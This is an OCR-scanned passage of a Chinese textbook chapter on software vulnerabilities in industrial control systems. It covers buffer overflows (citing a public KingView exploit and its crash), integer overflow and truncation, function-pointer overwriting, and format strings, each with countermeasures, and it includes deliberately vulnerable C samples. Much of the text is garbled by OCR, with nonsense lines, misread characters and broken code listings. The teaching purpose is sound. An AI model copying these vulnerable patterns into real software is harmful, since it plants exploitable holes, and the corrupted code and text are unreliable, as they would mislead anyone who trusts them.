为 了 证 明 缓 冲 区 溢出 这 种 古老 的 漏洞 类 型 也 存在 于 工控 系统 之 中 ， 并 且 利用 缓冲 区 溢出 漏洞 对 工控 系统 的 攻击 仍 能 奏效 ， 下 面 列 出 了 一 些 天 于 缓冲 区 溢出 的 
ICS-CERT 公 告 : 


- https: //ics-cert.us-cert. gov /advisories /ICSA-15-111-02 
- https: //ics-cert.us-cert. gov /advisories /ICSA-15-120-01 
- https: //ics-cert.us-cert. gov /advisories / ICS A-15-097-01 
- https: //ics-cert.us-cert. gov /advisories /ICSA-15-092-01 
- https: //ics-cert.us-cert. gov /advisories /ICSA-15-071-01 
- https: //ics-cert.us-cert. gov /advisories /ICSA-15-069-03 
- https: //ics-cert.us-cert. gov /advisories /ICSA-11-091-01A 


xia PRO eee, OSS. Hi KA RAMA, Bih—A RU Ler. aR, Beat A 
将 大 量 数据 填充 到 缓冲 区 导致 数据 被 覆盖 ， 而 程序 员 却 假设 一 切 都 没有 问题 。 唉 ， 可 事实 上 并 非 如 此 。 


就 构造 一 个 包含 可 执行 代码 的 特殊 字符 串 而 言 ， 需 要 知道 目标 计算 机 体系 结构 的 汇编 语言 ， 并 编写 出 这 段 代 码 。 开 发 有 效 并 且 可 重用 的 shellcode 是 一 个 更 加 
深入 的 主题 。 已 经 有 一 些 工 具 集 可 以 使 开发 过 程 更 加 简单 易 行 ， 如 Metasploit (http://www.metasploit.com/) 。 


让 我 们 来 看 看 到 底 有 多 容易 ， 下 面 这 个 例子 是 对 WellinTech 公 司 发 布 的 老 版 本 King-View (6.53) 实施 的 攻击 ， 该 漏洞 目前 已 经 打上 了 补丁 。KingView 在 
777 端 口上 运行 工业 实时 历史 数据 库 的 服务 端 ， 并 且 访 软件 的 6.53 版 本 容易 遭受 堆 溢 出 攻击 。 在 https://www.exploit-db.com/exploits/15957/ 中 提供 了 一 段 针 
对 该 漏洞 的 公开 漏洞 利用 代码 。 漏 洞 利用 代码 中 的 注释 介绍 了 堆栈 跟踪 信息 和 汇编 代码 的 细节 。 漏 洞 利用 代码 大 约 包 含 30 行 Python 代码 ， 看 起 来 相当 简单 。 只 需 
要 针对 服务 端 运 行 该 代码 (如 果 漏 洞 利用 代码 文件 保存 为 exploit.py， 那 么 就 可 以 使 用 命令 python exploit.py 来 实现 漏洞 利用 ) 。 下 面 是 服务 端的 运行 结果 : 


F 


HistorySvr Module 


HistoryS vr Module has encountered a problem and needs 
to close. We are sorry for the inconvenience. 


If you were in the middle of something, the information you were working on 
might be lost. 
Please tell Microsoft about this problem. 


We have created an error report that you can send to us. We will treat 
this report as confidential and anonymous. 


To see what data this error report contains, click here. 


Send Error Report | 


即使 只 是 使 用 该 漏洞 的 PoC (proof-of-concept) ， 也 会 造成 工业 实时 历史 数据 库 的 崩溃 。 因 此 ， 操 作 人 员 需 要 重启 程序 才能 够 再 次 运行 。 在 最 糟糕 的 情况 
下 ,漏洞 利 用 数据 包 会 包含 现实 可 用 的 可 执行 代码 来 实现 对 服务 端的 控制 。 对 于 控制 城市 供水 、 友 电 甚 至 国防 设施 的 软件 来 说 (http://www.icpdas- 
usa.com/king view.html) ， 失 控 并 不 是 件 好 事 。 


读者 可 能 会 想 知道 为 什么 这 样 一 种 技术 型 攻击 的 难 易 度 评级 是 如 此 之 高 。 这 是 因为 ， 生 成 含有 可 执行 代码 的 漏洞 利用 代码 确实 需要 一 些 技巧 。 如 果 不 具 备 相 
应 的 技术 实力 ， 攻 击 者 可 能 只 会 友 起 拒绝 服务 攻击 (这 是 本 章 中 所 列 出 的 许多 漏洞 的 情况 ) 。 不 过 拒绝 服务 攻击 对 工控 系统 的 影响 也 是 相当 高 的 。 这 里 列 出 的 难 
易 度 可 能 并 不 总 是 与 其 他 来 源 如 OWASP 和 国家 漏洞 数据 库 (National Vulnerability Database, NVD) 的 评级 相 一 致 ， 因 为 同 拒绝 服务 攻击 相 比 ， 这 些 评价 机 
构 往往 更 关心 任意 代码 执行 漏洞 。 但 工控 系统 的 世界 远 没 有 那么 奢侈 ，。 

3. 缓 冲 区 溢出 的 对 抗 措施 


虽然 缓冲 区 溢出 的 风险 相当 高 ， 但 是 漏洞 的 修复 通常 却 相当 简单 。 当 直接 对 固定 长 度 的 数组 进行 操作 时 ， 不 要 在 超出 数组 末尾 的 位 置 尝试 读 取 或 写 入 。 这 就 


要 求 需要 知道 数组 的 末尾 位 置 在 哪里 。 循 环 操作 往往 是 罪 鬼 祸首。 虽然 编写 和 验证 循环 不 变 式 可 能 是 一 项 乏味 的 工作 ， 但 是 确实 能 够 帮助 避免 产生 对 系统 造成 破 
坏 的 漏洞 。 


另 一 件 需要 注意 的 是 危险 函数 和 库 文件 的 使 用 。 应 该 在 代码 中 得 找 C 语 言 中 和 贞 名 昭著 的 函数 ， 例 如 gets () 和 scanf () ， 并 将 其 蔡 换 为 具有 相同 功能 的 安全 
函数 (有 天 详细 信息 ， 可 以 参阅 相关 开发 语言 的 参考 捐 南 ) 。 如 果 一 个 函数 涉及 缓冲 区 的 处 理 ， 特 别 是 向 缓冲 区 中 写 入 数据 ， 并 且 不 提供 长 度 限 制 机 制 ， 那 么 这 
个 通 数 使 用 起 来 就 是 不 安全 的 。 通 过 进行 在 线 快速 搜索 来 判断 一 个 遂 数 使 用 起 来 是 否 安 全 能 够 快速 得 到 结果 。 


6.1.3 Baie: Tim. Mim. Sen Ses ABC 
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1. 整 型 溢出 原理 


整 型 是 编程 中 基本 的 数据 类 型 。 整 型 数据 中 仪 仪 包含 数字 。 而 数字 可 以 解释 为 任何 内 容 : 可 以 是 一 个 数字 ， 可 以 是 一 个 ASCIl 字 符 ， 也 可 以 表示 为 应 用 于 某 些 
数据 的 比特 掩 码 ， 还 可 以 表示 内 存 地 址 。 你 解释 成 什么 ， 数 据 就 是 什么 。 


作为 一 种 基本 的 通用 数据 类 型 ， 如 果 要 对 整 型 的 不 正确 使 用 进行 漏洞 利用 ， 那 么 理解 整 型 如 何 工作 是 非常 重要 的 。 首 先 ， 需 要 认识 到 ， 不 同 于 数学 中 的 整 
数 ， 计 算 机 中 的 整 型 数据 不 能 一 直 增 长 到 无 穷 大 。 基 于 CPU 的 架构 ， 整 型 通常 是 固定 长 度 的 。 现 代 的 台式 计算 机 或 笔记 本 大 多 是 基于 64 位 体系 结构 ， 但 是 较 早期 
的 系统 (工控 系统 中 的 大 部 分 系统 都 是 如 此 ) 仍 是 基于 32 位 体系 结构 。 部 分 小 型 嵌入 式 系统 甚至 还 在 使 用 基于 16 位 体系 结构 的 系统 。 无 论 整 型 数据 长 度 是 多 少 ， 
其 原理 都 是 一 样 的 。 那 就 是 固定 长 度 的 整 型 数据 只 有 有 限 的 表示 能 力 ， 存 在 可 以 表示 的 最 大 数 以 及 可 以 表示 的 最 小 数 。 对 于 32 位 无 符号 整 型 ( 非 负 整数 ) 而 言 ， 
所 能 存储 的 最 大 值 是 23*-1。 转 换 为 二 进 制 形式 ， 就 是 32 个 1， 表 示 为 : 1111: 11111111: 11111111: 11111111: 1111; 如 果 表 示 为 十 进 制 形式 ， 就 是 
4294967295。 这 也 就 是 4GB 中 所 包含 的 字 节 数 ， 正 好 是 Windows XP 中 内 存 容量 的 最 大 值 。 天 啊 ， 我 想 知 道 它们 如 何 存储 内 存 地 址 .….. 如 果 是 有 符号 整 型 ， 有 效 


数字 的 范围 则 从 [0，232-1] 转 换 为 [-23<，231-1]， 实 际 上 也 就 是 将 整个 区 间 往 负数 方向 偏 稳 了 50%。 我 们 在 这 里 不 会 深入 介绍 这 两 种 表示 方式 ， 也 不 会 去 深入 介 
绍 负数 如 何 表示 ， 以 及 非 负 整数 如 何 表示 ， 不 过 对 于 技术 受 虐 狂 来 说 这 还 是 比较 有 趣 的 。 


所 以 ， 如 果 已 经 是 最 大 数 了 ， 当 试图 对 其 再 加 上 一 个 数值 时 ， 会 发 生 什 么 呢 ? 那么 ， 让 我 们 看 看 以 二 进 制 的 形式 将 1 加 到 23 擂 1 上 会 怎么 样 。 需 要 指出 的 是 ，1 
+ 1 以 二 进 制 的 形式 表示 是 10。 


JLLLLLJLLLLJLJLJLJLJLLLLLLLLLLJLJLJLJLLLLJLL 


TIUUUUUQUUUUUUUUUUUUUUUUUUUUUUUUUUDU 


此 时 ， 与 1 相 加 之 后 232-1 会 一 直 向 下 一 有 效 位 进位 直到 无 1 可 加 。 但 是 等 一 下 .答案 中 有 33 位 数字 。 而 我 们 只 能 在 整 型 数据 中 存储 32 个 比特 。 那 么 ， 前 面 的 
1 位 数字 输出 会 发 生 什 么 呢 ? 此 时 的 情况 是 多 出 1 位 输出 会 被 删 掉 。 那 么 实际 上 所 存储 的 就 会 是 一 大 堆 0。 这 就 是 基本 的 整 型 溢出 。 从 效果 上 来 说 ， 就 相当 于 执行 取 


模 操 作 。 可 以 将 整 型 上 的 每 个 算术 操作 ， 都 看 作 以 23“ 取 模 操 作 (这 是 32 位 整数 。 对 于 n 比 特 数据 类 型 ， 使 用 2n 作 为 模 数 ) 。 在 另 一 边 也 存在 类 似 、 但 效果 相反 的 
情况 。 当 值 相 减 、 并 且 超出 数据 类 型 的 空间 限制 时 融会 出 现下 溢 。 对 于 无 符号 整 型 而 言 ，0-1 的 结果 是 一 个 巨大 的 正 整数 。 


这 些 类 型 的 漏洞 有 时 会 将 大 量 数据 从 一 个 缓冲 区 复制 到 另 一 个 缓冲 区 ， 从 而 导致 缓冲 区 溢出 ， 而 最 终 导 致远 程 代码 执行 。 当 通过 整 型 上 洪 或 下 溢 对 控制 复制 
字 节 数 的 整 型 数据 进行 操作 时 ， 那 么 程序 员 在 开发 时 所 想 进 行 的 操作 .…… 融 变 得 不 太 可 能 实现 了 。 


加 法 与 减法 并 不 是 触 友 上 溢 或 下 溢 的 唯一 算 林 操作。 考虑 OpenSSH3.3 中 的 这 段 代 码 : 


nresp = packet get int () ; 

if (mresp > 0) { 
response = xmalloc(nresp*sizeof (char*) ); 
for (i = 0; i < nresp; i++) 


response[i] = packet get string(NULL) ; 


对 于 32 位 系统 而 言 ，sizeof (char*) 会 返回 4。 如 果 nresp 的 值 为 1073741824， 或 者 更 大 的 数值 ， 那 么 xmalloc () 调用 中 乘法 操作 的 结果 融会 溢出 ， 导 致 
response 绥 冲 区 非常 小 ， 进 而 在 for 循 环 中 溢出 。 


溢出 并 不 是 整 型 变量 获取 意外 值 的 唯一 方式 。 将 数据 从 较 大 的 数据 类 型 简单 地 复制 到 较 小 的 数据 类 型 也 可 能 具有 类 似 的 结果 。 这 种 情况 称 之 为 截断 
(truncation) 。 假 设 有 下 列 代码 : 


int x = 49152; 
short int y = X; 
printf ("Sd\n", y); 


f 


上 述 代码 的 输出 是 -16384 而 非 49152。 这 是 因为 一 个 short int 数 据 类 型 仅 能 保存 16 个 比特 ， 从 而 导致 二 进 制 表 示 中 最 前 面 的 1 在 赋值 操作 时 丢失 。 与 其 完全 一 
致 的 场景 不 太 可 能 在 真实 代码 中 出 现 ， 但 是 这 一 类 型 的 问题 可 能 会 经 常 出 现 。 当 按照 开发 时 的 设想 运行 程序 时 ， 一 切 都 没有 问题 ， 但 是 当 出 现 一 个 意料 之 外 的 数 
值 较 大 的 整 型 数据 时 ， 融 可 能 破坏 程序 的 运行 。 该 场景 中 的 危险 乙 处 在 于 ， 代 码 看 起 来 会 在 y 中 人 存储 一 个 正 整数 ， 但 是 它 的 结果 却 是 一 个 负数 。 如 果 用 该 变量 分 配 
一 块 内 存 ， 那 么 就 很 可 能 导致 程序 出 现 骨 溃 。 


假设 跟 在 之 前 代码 片段 后 面 的 代码 如 下 所 示 : 


char *buf = (char*)malloc(y) ; // Allocate y bytes and 
// typecast it as a char* 
memset (buf, 0, y}; // Set y bytes, starting at 


// location pointed to by 
// buf, to zero 


先 抛 开 人 们 大 多 不 愿意 像 这 个 例子 中 一 样 分 配 一 块 49152 个 字 节 的 空间 不 谈 。 这 时 会 友 生 什么 情况 呢 ? SAY, malloc () 的 参数 类 型 为 size t， 该 类 型 本 质 上 
其 实 束 是 unsigned int。 这 意味 着 对 于 short int 类 型 的 参数 y， 必 须 先 转换 为 完整 的 int 类 型 ， 然 后 再 将 其 解释 为 无 符号 数 。 当 值 -16384 转 换 为 unsigned int 类 型 
时 ， 即 为 4294950912。 这 就 是 malloc () 所 要 分 配 的 字 节 数 。 访 值 位 于 4GB 的 边界 ， 空 间 分 配 几 乎 肯定 是 要 失败 的 。 因 此 ， 和 希望 在 像 本 例 一 样 使 用 malloc () 
返回 值 忆 前， 对 其 进行 检查 ， 但 是 对 于 使 用 过 程 中 隐 式 信任 的 值 而 言 ， 则 通 弟 不 会 进行 检查 操作 。 这 个 漏洞 虽然 可 能 不 会 导致 任意 代码 远程 执行 ， 但 它 会 导致 程 
序 崩 演 ， 对 于 工控 系统 而 言 ， 这 几乎 束 是 最 坏 的 结果 。 


还 有 其 他 整 型 滥用 的 巧妙 方法 。 简 单 的 如 变量 符号 失 配 之 类 的 问题 就 能 够 导致 漏洞 利用 。 思 考 下面 的 例子 : 


#include <stdio.h> 
#include <string.h> 


void f (char* src) 


{ 


char dst [22]; // Allocate 22 bytes of stack space 
char len = strlen(src) ; // Get length of sre string 


if (len < 22) { 
strepy(dst, src); // Copy string from src to dst 
printf ("Copied string is '%s'.\n", dst); 

} else { 
printf ("Source string is too long to copy! \n") 


int main() 


// Initialize some strings to test 


char* sl = "This is test string 1"; 
char* s2 = "This is test string 2, which is too long"; 
char* s3 = "This is the longer and more dangerous test string3. Why 


is this dangerous? Because it so just happens to be 128 characters 
Long!" 


// Run strings through the vulnerable function 
下 二 本 
tf (s2) ; 
LABS) 


return 0 


ar 


这 里 是 该 程序 的 输出 : 


Copied string is 'This is test string 1'. 

Source string is too long to copy! 

Copied string is 'This is the longer and more dangerous test string3. 
Why is this dangerous? Because it so just happens to be 128 characters 
long!'. 

Segmentation fault (core dumped) 


结果 会 怎么 样 呢 ? 这 里 要 注意 的 关键 是 ， 使 用 (有 符号 ) char 类 型 来 存储 strlen () 的 返回 结果 ， 该 消 数 的 返回 结果 为 size_t 类 型 (unsigned int， 即 无 符号 
整 型 ) 。 这 意味 着 如 果 返 回 结果 为 128， 那 么 会 被 解释 为 -127， 而 -127 肯 定 小 于 22。 所 以 ， 执 行 if 代码 块 ， 会 将 整个 字符 串 复制 到 目标 缓冲 区 ， 而 由 于 目标 缓冲 区 
太 小 难以 容纳 该 字符 串 ， 就 会 导致 缓冲 区 溢出 。 (顺便 提 一 句 ， 同 时 也 向 热衷 于 代码 格式 化 的 人 们 道 个 歉 : 是 的 ， 我 在 else 代 码 块 外 面 也 加 上 了 大 括号 。 我 在 过 
去 几 年 中 一 直 遵 循 PSR 标 准 进行 PHP 开 发 。 我 已 经 习惯 了 这 种 编程 风格 。 ) 


在 比较 过 程 中 ， 有 符号 类 型 同 无 符号 类 型 的 不 相 匹配 可 能 导致 问题 ， 这 也 是 为 什么 大 多 数 编译 器 都 会 对 此 做 出 警告 的 原因 ! 必须 了 解 编译 器 和 编程 语言 在 不 
同情 况 下 的 行为 。 当 将 有 符号 类 型 的 变量 与 无 符号 类 型 的 变量 (使 用 不 等 式 或 类 似 的 东西 ) 进行 比较 时 ， 有 时 有 符号 类 型 的 变量 会 隐 式 强制 类 型 转换 为 无 符号 
值 。 其 他 时 候 ， 无 符号 类 型 变量 则 会 隐 式 强制 类 型 转换 为 有 符号 值 。 而 如 果 忽 略 编译 器 警告 ， 则 可 能 会 出 现 一 些 非常 糟糕 的 情况 。 


2. 同 工控 系统 的 关联 


鉴于 这 种 类 型 的 漏洞 非常 微妙 并 且 非 党 底层， 可 以 想象 到 在 工控 系统 应 用 程序 中 很 可 能 存在 这 些 漏洞 。 事 实 上 ，1CS-CERT 也 确实 发 布 了 一 些 关 于 整 型 洪 出 
(包括 下 溢 、 截 断 和 符号 失 配 ) 的 漏洞 公告 : 


* https://ics-cert.us-cett.gov/advisoties/ICSA-14-343-02 
* https://ics-cert.us-cett.gov/advisories/ICSA-12-341-01 


- https://ics-cert.us-cett.gov/advisoties/ICSA-13-095-02A 


整 型 相关 的 漏洞 难以 友 现 和 调试 。 它 们 可 能 存在 于 应 用 程序 中 多 年 而 未 被 发 现 。 对 输入 进行 测试 ， 来 看 看 意外 输入 (如 负数 或 数值 过 大 的 整数 ) 是 否 会 引起 
什么 问题 。 了解 二进制 数据 如 何 表示 可 以 帮助 选择 “有 趣 ” 的 值 进行 测试 。 这 些 值 往往 接近 2 的 吉 值 (例如 ，127、128、129、255、256、257 等 等 ) 。 


3. 整 型 溢出 的 对 搞 措 施 


寻找 同 整 型 相关 的 漏洞 可 能 非常 困难 。 而 整 型 漏洞 的 修复 有 时 也 很 困难 。 其 天 键 在 于 要 知道 对 数据 做 出 了 哪些 要 求 ， 然 后 在 数据 用 于 任何 操作 之 前 检查 是 否 
满足 了 这 些 要 求 。 此 外 ， 还 需要 牢记 整数 类 型 的 隐 含 假设 ， 那 残 是 整 型 数据 长 度 都 是 有 限 的 ， 并 且 在 用 户 操作 下 会 出 现 截 断 。 无 论 是 在 可 能 导致 上 溢 、 下 活 的 算 
术 操 作 之 前 还 是 在 算术 操作 之 后 进行 测试 ， 都 皖 令 人 厌烦 的 ， 但 又 必须 这 样 做 。 特 别 要 注意 的 是 ， 不 要 出 现 溢 出 临时 结果 变量 的 表达 式 。 例 如 |， 


if (vall + val2 < MAX INT) { 
// do calculations involving vall and val2 


这 种 表达 式 所 表示 的 含义 没有 问题 ， 但 是 执行 起 来 会 导致 失败 。 如 果 val1+val2 大 于 MAX_INT， 则 表达 式 左 边 的 值 将 会 溢出 并 截断 ， 从 而 使 得 条 件 判 断 语句 
为 真 。 有 时 借助 一 个 简单 的 代数 操作 束 可 以 避免 这 一 点 。 如 果 val1 和 val2 都 是 正 值 ， 那 么 可 以 将 条 件 可 以 改写 为 val2<max_int-val1， 这 样 束 不 会 出 现 上 洪 或 者 下 
溢 的 风险 。 为 了 避免 整 型 有 天 的 漏洞 ， 必 须 注意 这 一 点 。 对 任何 算术 运算 、 比 较 操 作 (有 符号 数 与 无 号 数 ) 以 及 类 型 强制 转换 或 者 转换 操作 都 应 该 仔细 检查 ， 以 
确保 这 些 操作 中 不 会 引入 整 型 漏洞 。 


6.1.4 指针 操纵 


1. 指 针 操纵 原理 


呵 ， 指 针 。 程 序 员 对 指针 真是 爱 恨 交 加 。 借 助 指 针 能 够 实现 各 种 有 趣 的 数据 结构 和 优化 ， 但 是 如 果 对 指针 处 理 不 当 ， 则 可 能 会 导致 整个 程序 的 骨 溃 。 指 针 ， 
简单 说 来 ， 融 是 值 为 内 人 存 地 址 的 变量 。 所 以 ， 在 我 们 讨论 EBP、EIP 和 ESP 等 寄存 器 时 ， 其 中 的 P 残 是 指 这 种 类 型 的 “指针 ” 。 尽 管 通用 指针 也 可 以 存储 在 内 人 中 ， 
而 不 仪 仪 是 存储 在 CPU 寄 存 器 中 ， 但 是 内 存 地 址 可 以 指向 内 存 中 的 任何 地 方 。 有 些 地 址 可 以 指向 正在 运行 的 程序 中 的 内 存 区 域 ， 有 些 地 址 可 以 指向 多 个 程序 使 用 
的 共享 库 的 内 存 区 域 ， 还 有 些 地 址 可 以 指向 不 属于 任何 程序 的 内 存 区 域 。 如 果 曾 经 在 C 语 言 中 使 用 过 指针 ， 并 出 现 了 一 个 分 段 错 误 ， 那 么 很 可 能 是 因为 “间接 引 
用 ”了 一 个 无 效 指针 (也 就 是 说 ,试图 获取 存储 在 指针 中 的 地 址 的 值 ， 即 内 存 中 的 值 ) 。 它 们 很 容易 搞 砸 整个 程序 。 


尽管 很 容易 搞 砸 整个 程序 ， 但 是 大 家 依然 一 直 使 用 指针 。 为 什么 呢 ? 这 是 因为 几乎 所 有 酷 炫 的 东西 ， 都 可 以 借助 指针 来 完成 。 可 以 将 指向 大 块 数据 集 的 指针 


传递 到 函数 中 ， 这 样 就 无 需 将 整个 数据 集 复 制 到 调用 堆栈 ; 可 以 将 多 段 数据 动态 地 链接 在 一 起 ， 从 而 增加 数据 的 整体 规模 ; 也 可 以 使 用 指针 来 跟踪 动态 分 配 的 内 
存 区 域 (ESI) ; 还 可 以 让 指针 指向 某 一 国 数 的 内 存 地 址 ， 以 便 动 态 地 更 改 程序 的 行为 ! 在 程序 运行 的 时 候 ! (对 于 我 的 激动 ， 我 深 表 歉意 。(C 语 言 伴随 我 成 
长 。 在 那个 时 代 我 还 没有 使 用 过 Python、PHP 和 Javascript 这 类 时 暑 的 语言 ， 在 这 些 语言 中 可 以 像 传递 整数 一 样 传递 函数 ) 。 


这 里 有 一 个 简单 的 图 表 来 进行 说 明 : 


Ox1A1C 
Ox1A18 
Ox1A14 
Ox1A10 
Ox1A0C 
Ox1A08 


Ox1A04 


Ox1A00 | Ox1A10 


在 图 的 左 侧 ， 给 出 了 内 存 块 的 地 址 (每 块 内 存 占 用 4 个 字 节 ) ， 从 底部 的 低地 址 开始 向 上 增长 。 和 矩形 内 部 是 存储 在 内 存 中 的 值 ， 右 边 是 代码 中 使 用 的 变量 名 。 
下 面 是 反映 这 种 内 存 布局 的 代码 片段 : 
int A = 42; 
int *ptrA = &A; 


这 段 代 码 初 始 化 了 两 个 变量 。 变 量 A 是 值 为 42 的 整 型 变量 。 变 量 ptrA 是 指向 整 型 的 指针 变量 ， 该 指针 被 设置 为 A 的 地 址 (& 符 号 表示 某 变量 的 “地 址 ”) 。 


在 缓冲 区 溢出 部 分 ， 我们 讨论 了 如 何 覆 盖 EIP 寄 存 器 的 值 。 仪 仪 获 蘑 该 寄存 器 的 值 还 并 不 会 造成 危害 。 只 有 当 程 序 尝 试 使 用 该 值 时 ， 才 会 对 程序 造成 危害 。 这 
一 原则 适用 于 所 有 指针 (实际 上 适用 于 所 有 变量 类 型 .….. 指 针 操 纵 只 是 内 存 损坏 的 一 种 特例 ) 。 在 这 里 ， 缓 冲 区 溢出 导致 了 指针 操纵 攻击 ， 但 缓冲 区 溢出 并 不 是 导 
致 指针 操纵 的 唯一 方式 。 有 很 多 复杂 的 方法 可 以 将 本 章 中 提 到 的 漏洞 组 合 起 来 以 对 内 存 中 的 值 进行 操作 ， 甚 至 都 不 会 对 目标 内 存 地 址 周围 的 值 造成 影响 。 


让 我 们 来 看 一 个 例子 。 思 考 下 面 的 代码 : 


#include <stdio.h> 


void print list (int* list) 


{ 
int i; 
// Assume list is exactly 10 items long 
for (i = 0; i < 10; i++) { 
Prince ("t2 wm", Jae [a] ) } 
} 
} 


/f This function is never called 
void bad fn(int *blah) 
{ 


printf£("I'm never called by the program!"); 


int main() 


{ 
void (*fn) (int*); // Pointer to a function that 
// expects an int* parameter 
int items[10] = {0, 1, 1, 2, 3, 5, 8, 13, 21, 34}; 


int i1; 


int val; 
En = print LISE; 


printf ("Enter a value: "); 


scanf("%i", &val); // read a value into val from user 
printf ("Which value to replace (0-9)? "); 


scanf ({("$1", &1); //f read a value into i from user 


printf ("Before alteration:\n"); 
fn (items): // Call function that fn points to 


items[i] = val; 


printf ("After alteration: \n"); 
fn (items); // Call function that fn points to 


return 0; 


这 个 例子 编写 得 可 能 有 点 刻意 ， 但 是 能 够 说 明 问 题 。 下 面 是 程序 的 执行 结果 。 代 码 第 一 次 接收 的 是 预期 输入 ， 第 二 次 接收 的 是 非 预 期 输入 。 


S ./a.exe 

Enter a value: 99 

Which value to replace (0-9)? 5 
Before alteration: 


34 
After alteration: 


$s ./a.exe 

Enter a value: 4198681 

Which value to replace (0-9)? 10 
Before alteration: 


NF Ou WN FE F O 


e WwW 


34 
After alteration: 


I'm never called by the program! 


正如 读者 所 看 到 的 ， 两 次 执行 的 结果 完全 不 同 。 即 使 从 未 调用 过 bad fn () 函数 ,程序 第 二 次 运行 时 也 会 执行 该 函数 。 此 时 ， 即 便 对 该 输入 执行 相同 的 代 
码 ， 执 行 起 来 也 可 能 不 会 那么 顺利 了 。 关 键 在 于 那个 看 似 神奇 的 数字 ，4198681。 看 到 4198681， 我 们 能 想到 什么 呢 ? 它 恰巧 是 0x00401119 的 十 进 制 (基数 为 


10) 表示 。 我 们 通过 使 用 objdump (objdump-D< 程 序 名 >) 和 gdb 对 目标 程序 进行 反 汇 编 ， 发 现 该 值 正 是 函数 bad fn () 的 地 址 。 然 后 ， 由 于 函数 scanf () 
的 输入 值 要 求 为 十 进 制 数 ， 所 以 我 们 将 该 十 六 进 制 数 转 损 为 十 进 制 数 。objdump 和 gdb 是 两 个 小 I5 的 Linux 工 具 ， 用 于 程序 反 汇 编 和 调试 。 这 两 个 工具 功能 强大 ， 
但 只 有 命令 行 界面 。 对 于 初学 者 而 言 ， 可 能 显得 不 太 友好 。 在 实时 系统 中 ， 黑客 可 能 会 以 同样 的 方式 发 现 这 个 “神奇 ”的 数值 。 如 果 黑 客 也 有 一 个 该 可 执行 程序 
的 副本 ， 那 么 殊 可 能 会 友 现 在 编译 时 总 是 将 该 函数 沪 载 到 相同 的 内 存 地 址 (不 同 于 重 定位 ) 。 另 外 ， 黑客 可 能 会 多 次 运行 目标 程序 ， 尝 试 找 出 那些 或 许 会 得 到 有 
趣 结果 的 输入 值 〈 见 第 7 章 对 模糊 测试 和 调试 器 的 讨论 ， 还 有 其 他 可 能 更 加 适合 该 任务 的 工具 介绍 ) 。 


这 个 简单 的 示例 演示 了 众多 控制 指针 数值 方法 中 的 一 种 ， 这 些 方法 可 能 会 导致 一 些 糟糕 或 者 说 是 有 趣 的 结果 (取决 于 读者 的 角度 啦 ) 。 如 果 采 用 随机 数值 ， 
目标 程序 很 有 可 能 会 朋 溃 。 另 外 ， 攻 击 者 还 可 以 借助 某 个 数值 来 绕 过 安全 保护 〈 通 过 跳 转 到 函数 中 间 ) ， 该 安全 保护 在 敏感 操作 之 前 进行 安全 检查 ， 也 可 以 借助 
某 个 数值 使 其 指向 攻击 者 控制 的 数据 缓冲 区 ， 从 而 导致 任意 代码 执行 漏洞 。 


2. 同 工控 系统 的 关联 


更 高 级 的 语言 ， 例 如 Python、PHP、C# 往 往 没 有 指针 所 带 来 的 问题 (尽管 这 些 语言 并 不 一 定 具 备 对 抗 上 述 问 题 的 能 力 ) ， 因 为 这 些 语言 自身 对 指针 进行 了 隐 
藏 以 防止 程序 员 访 问 指针 ， 这 正 是 这 些 语 言 经 常 被 吹捧 的 优势 之 一 。 这 种 便利 的 特性 被 称 之 为 托管 代码 (managed code) ， 这 意味 着 由 开发 语言 自己 管理 内 存 
的 分 配 和 释放 。 然 而 ， 许 多 工控 系统 应 用 软件 ， 特 别 是 为 褒 入 式 系统 编写 的 软件 ， 都 是 采用 CC 语言 编 写 的。 事实 上 ， 在 写 这 篇 文章 的 时 候 ，(C 语 言 基本 上 与 java 语 
言 并 列 为 世界 上 最 常 使 用 的 编程 语言 (http://spectrum.ieee.org/computing/software/the-2015-top-ten-programming-languages) 。 紧 随 其 后 的 是 
C++， 而 C++ 也 允许 使 用 指针 。 因 此 ， 出 于 安全 考虑 的 指针 操纵 问题 并 不 会 很 快 消失 。 以 下 是 一 些 易 受 指针 操纵 影响 的 工控 系统 应 用 程序 : 


* https://ics-cert.us-cett.gov/advisories/ICSA-11-340-01 

- https://ics-cert.us-cett.gov/advisoties/ICSA-12-213-01A 

* https://ics-cert.us-cett.gov/advisories/ICSA-12-185-01 
3. 指 针 操纵 的 对 抗 措施 


跟 路 指针 操纵 漏洞 (以 及 任何 其 他 内 存 破坏 漏洞 ) 的 过 程 可 能 很 棘手 。 例 如 ， 在 前 面 的 示例 中 ， 只 有 在 另 一 个 变量 的 处 理 过 程 中 人 存在 错误 时 ， 才 能 够 对 捐 针 
进行 操作 。 这 样 看 来 ， 指 针 操纵 更 像 是 一 个 漏洞 的 副产品 ， 而 非 自 己 独 有 的 漏洞 。 但 指针 操纵 确实 为 攻击 者 提供 了 对 系统 进行 漏洞 利用 的 独特 方法 。 这 里 的 关键 
在 于 ， 就 像 在 大 多 数 安全 编码 过 程 中 一 样 ， 要 绝对 确保 对 涉及 指针 的 所 有 数据 、 甚 至 是 指针 附近 的 数据 进行 验证 。 为 了 抵御 本 例 中 提 到 的 漏洞 攻击 ， 方 法 之 一 是 
在 代码 中 首先 放置 缓冲 区 变量 ， 这 样 在 溢出 的 情况 下 束 不 会 覆盖 到 其 他 的 局 部 变量 。 当 然 ，EIP 寄 存 器 仍然 可 能 被 破坏 ， 所 以 最 好 的 解决 方法 是 直接 解决 组 ;站 区 溢 


出 问题 。 


6.1.5 格式 化 字符 串 


oy a i 
TR : 


1. 格 式 化 字符 串 原理 


格式 化 字符 串 是 用 于 指示 数据 格式 的 具有 特殊 结构 的 字符 捉 。 在 大 多 数 情况 下 ， 格 式 化 字符 串 漏洞 是 人 程序 中 的 一 水 奇 范 。 像 printf () 、sprintf () 、 
fprintf () 之 类 的 函数 都 使 用 格式 化 字符 串 来 精确 指示 数据 如 何在 屏幕 上 显示 。 还 有 一 些 冰 数 以 格式 化 字符 串 为 输入 ， 如 scanf () 和 sscanf () 函数 。 下 面 是 一 
个 相对 比较 简单 的 例子 ， 解 释 如 何 使 用 格式 化 字符 串 : 


int x = 5; 
float y ae E 


char *s = "Here's a string"; 


printf("%i is an integer, *f is a float, '%s' is a string\n", x, y, 8); 


其 中 的 %i、%f、9%s 都 是 占 位 符 ， 它 们 将 在 格式 化 字符 串 后 面 获取 相应 函数 参数 的 值 。 然 而 ， 这 并 不 是 说 国 数 printf () 总 是 以 包含 int 类 型 、float 类 型 和 
char* 类 型 的 格式 化 字符 串 为 输入 。 


ES 

人 D 

nt ` 
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在 C 和 C++ 中 ， 任 何 数据 类 型 (如 char) BON “*” ， 都 表示 该 数据 类 型 是 指向 所 列 出 数据 类 型 的 指针 。 因 此 ，chatrk 意 味 着 “指向 chaf 类 型 的 指针 ” 。intk 意 
